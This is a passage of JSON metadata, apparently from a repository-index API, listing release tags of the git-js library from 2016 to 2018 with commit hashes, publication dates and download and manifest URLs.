f5b366b8901","kind":"tag","published_at":"2018-10-02T13:38:41.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.104.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.104.0/manifests"},{"name":"v1.103.0","sha":"90a3c3783efa502f7836a5e4e88cf3d92bb25649","kind":"tag","published_at":"2018-09-29T06:26:46.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.103.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.103.0/manifests"},{"name":"v1.102.0","sha":"64f7502e92596701e023824c189a7b2f177a3252","kind":"tag","published_at":"2018-09-22T09:10:52.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.102.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.102.0/manifests"},{"name":"v1.101.0","sha":"910e3bc638e4f4e15389ec28b8e5d532e2cf535c","kind":"tag","published_at":"2018-09-22T09:10:00.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.101.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.101.0/manifests"},{"name":"v1.100.0","sha":"85f8814885d87155f8f769a228b9b7b83918b64a","kind":"tag","published_at":"2018-09-17T09:24:09.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.100.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.100.0/manifests"},{"name":"v1.99.0","sha":"7f0d5201ba1730c9973c66b7c92fb719c5434cc9","kind":"tag","published_at":"2018-09-17T08:04:58.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.99.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.99.0/manifests"},{"name":"1.98.0","sha":"f9ff9cb4f6ff2a9975814ee1f862eabd668a0fe5","kind":"tag","published_at":"2018-09-17T06:51:43.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.98.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.98.0/manifests"},{"name":"1.97.0","sha":"2aaff8ca8fe67aaee0878955da434b630571a781","kind":"tag","published_at":"2018-08-02T06:31:00.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.97.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.97.0/manifests"},{"name":"1.96.0","sha":"5be44fe6e701762e73f6e943c13a060280e1277a","kind":"tag","published_at":"2018-06-09T09:18:29.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.96.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.96.0/manifests"},{"name":"1.95.1","sha":"bf3784a2f337826c53747e1635cd305cb56fa9f1","kind":"tag","published_at":"2018-06-02T06:45:14.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.95.1","html_url":"https://github.com/steveukx/git-js/releases/tag/1.95.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.95.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.95.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.95.1/manifests"},{"name":"1.95.0","sha":"03c93d7ab3ddc0940300eea8b52526a433927626","kind":"tag","published_at":"2018-05-22T15:56:14.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.95.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.95.0/manifests"},{"name":"1.94.0","sha":"3496d58b4b4d8727a4138747835a3b54105de30f","kind":"tag","published_at":"2018-05-22T06:56:16.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.94.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.94.0/manifests"},{"name":"1.93.0","sha":"0006c2b1d00ffea5d37b69ad353626f6ab4df151","kind":"tag","published_at":"2018-03-14T16:46:14.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.93.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.93.0/manifests"},{"name":"1.92.0","sha":"e4d8f6e695b7e6920d1a897feb0b910f55c2f02a","kind":"tag","published_at":"2018-03-03T20:01:21.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.92.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.92.0/manifests"},{"name":"1.91.0","sha":"5e334bf47fbacd1c24500b4367a0feb639bf3a94","kind":"tag","published_at":"2018-02-21T06:13:56.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.91.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.91.0/manifests"},{"name":"1.90.0","sha":"c6e7e28c853ea7f413c09fd4d1e8345dfb37dc11","kind":"tag","published_at":"2018-02-07T15:37:18.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.90.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.90.0/manifests"},{"name":"1.89.0","sha":"6a9045ad0d1c92b350afbea968fad712ba8c6b24","kind":"tag","published_at":"2018-01-21T14:56:31.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.89.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.89.0/manifests"},{"name":"1.88.0","sha":"05f151bc0abb03d17ffe4d1d61112a761447f064","kind":"tag","published_at":"2018-01-21T14:49:37.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.88.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.88.0/manifests"},{"name":"1.87.0","sha":"041862fd2d40df851104e29ecd395ce6f7bc91e1","kind":"tag","published_at":"2018-01-12T10:46:30.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.87.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.87.0/manifests"},{"name":"1.86.0","sha":"4d2e64a52ae04eae66eb5d62e7d31ee970bb9e6a","kind":"tag","published_at":"2017-12-13T10:43:58.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.86.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.86.0/manifests"},{"name":"1.85.0","sha":"2bc60762b6379c85ca202ded061af2ff45f6a5ad","kind":"tag","published_at":"2017-12-09T08:29:41.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.85.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.85.0/manifests"},{"name":"1.84.0","sha":"7f3cff5cec4b84c907c496a907f2dbc3179ee5f7","kind":"tag","published_at":"2017-11-30T14:59:15.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.84.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.84.0/manifests"},{"name":"1.83.0","sha":"873b453dd3acb77bb5c84a869a9e5e916df54b69","kind":"tag","published_at":"2017-11-29T09:22:53.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.83.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.83.0/manifests"},{"name":"1.82.0","sha":"d9855e21cbcf1db2aba843f9fe42792151775246","kind":"tag","published_at":"2017-11-14T08:33:08.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.82.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.82.0/manifests"},{"name":"1.81.1","sha":"c429b6d8904e06ab54bdbd51cfa611825bc9ee5b","kind":"tag","published_at":"2017-11-11T08:24:42.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.81.1","html_url":"https://github.com/steveukx/git-js/releases/tag/1.81.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.81.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.81.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.81.1/manifests"},{"name":"1.81.0","sha":"2196b53766eb257da0aa1b86e79558359496defc","kind":"tag","published_at":"2017-11-11T07:59:48.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.81.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.81.0/manifests"},{"name":"1.80.1","sha":"e4dd39929579f46fad12b2af934cb090c827b0da","kind":"tag","published_at":"2017-10-12T18:36:12.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.80.1","html_url":"https://github.com/steveukx/git-js/releases/tag/1.80.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.80.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.80.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.80.1/manifests"},{"name":"1.80.0","sha":"480fdd81443527898616ad92632dc6ce88809981","kind":"tag","published_at":"2017-10-12T18:34:55.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.80.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.80.0/manifests"},{"name":"1.79.0","sha":"f912697169fce2d507318f179c38ab32280f60b0","kind":"tag","published_at":"2017-10-05T20:06:28.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.79.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.79.0/manifests"},{"name":"1.78.0","sha":"7de30ae33b128dac764fca923bacb1ddb178c296","kind":"tag","published_at":"2017-10-05T19:16:23.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.78.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.78.0/manifests"},{"name":"1.77.0","sha":"d853bc13cdaf41ffdf6e363df8a55b09ccff147f","kind":"tag","published_at":"2017-09-03T11:17:00.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.77.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.77.0/manifests"},{"name":"1.76.0","sha":"5484d6440c9b7c316dee1d25c3aea4c19cef8466","kind":"tag","published_at":"2017-08-28T19:43:31.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.76.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.76.0/manifests"},{"name":"1.75.0","sha":"f597a07a852df513c94cad31f36219afad308ed0","kind":"tag","published_at":"2017-07-29T08:31:55.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.75.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.75.0/manifests"},{"name":"1.74.1","sha":"ed591cbd8b6e9316996f9ddabce84187186430b9","kind":"tag","published_at":"2017-07-20T21:07:03.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.74.1","html_url":"https://github.com/steveukx/git-js/releases/tag/1.74.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.74.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.74.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.74.1/manifests"},{"name":"1.74.0","sha":"8b05ebeda211b7bb49ca4dadd07c33baf3de5b57","kind":"tag","published_at":"2017-07-20T20:40:59.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.74.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.74.0/manifests"},{"name":"1.73.0","sha":"d54e4325414ac413c465d4a69646c178197fdfd1","kind":"tag","published_at":"2017-05-20T07:16:25.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.73.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.73.0/manifests"},{"name":"1.72.0","sha":"615de1454ca07ae101d12c94d8d5d38beab12b62","kind":"tag","published_at":"2017-05-06T16:29:17.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.72.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.72.0/manifests"},{"name":"1.71.0","sha":"0dab00c4ab60f14fe988b9e8c46d62bfa42b858f","kind":"tag","published_at":"2017-05-06T16:20:19.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.71.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.71.0/manifests"},{"name":"1.70.0","sha":"c803d51fd2afb9ff699e00c03fb24e5ef4b9ca27","kind":"tag","published_at":"2017-04-04T08:57:40.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.70.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.70.0/manifests"},{"name":"1.69.0","sha":"aa176960f9fdbd6e9cabc0463b0bad1e744b22ad","kind":"tag","published_at":"2017-03-29T19:01:29.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.69.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.69.0/manifests"},{"name":"1.68.0","sha":"b412f01e0dc352923f02501665cd6ff4c012e2d7","kind":"tag","published_at":"2017-03-28T08:02:40.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.68.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.68.0/manifests"},{"name":"1.67.0","sha":"583e3fd8b8c014f71ec2f1cc37751489bcaf3563","kind":"tag","published_at":"2017-03-04T09:04:32.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.67.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.67.0/manifests"},{"name":"1.66.0","sha":"89726429776ac4cf810e3443403aeeb48ab54ca8","kind":"tag","published_at":"2017-02-14T15:15:05.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.66.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.66.0/manifests"},{"name":"1.65.0","sha":"3946f1af6706d570cdddd60a5885c0fbd8bc6215","kind":"tag","published_at":"2016-12-09T09:18:27.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.65.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.65.0/manifests"},{"name":"1.64.0","sha":"2e429d3cacdd171ddff787b834d5481fc3964b00","kind":"tag","published_at":"2016-12-03T10:54:10.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.64.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.64.0/manifests"},{"name":"1.63.0","sha":"b5398bbd9c527ab09f691aa3a59fac128cdf6239","kind":"tag","published_at":"2016-11-26T08:36:05.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.63.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.63.0/manifests"},{"name":"1.62.0","sha":"fd01c217a122bf8175ba01ccee50eabe05cbb9ed","kind":"tag","published_at":"2016-11-08T20:40:42.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.62.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.62.0/manifests"},{"name":"1.61.0","sha":"32a345545ad2c1969c741af464297b691f0db4e5","kind":"tag","published_at":"2016-11-05T08:38:13.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.61.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.61.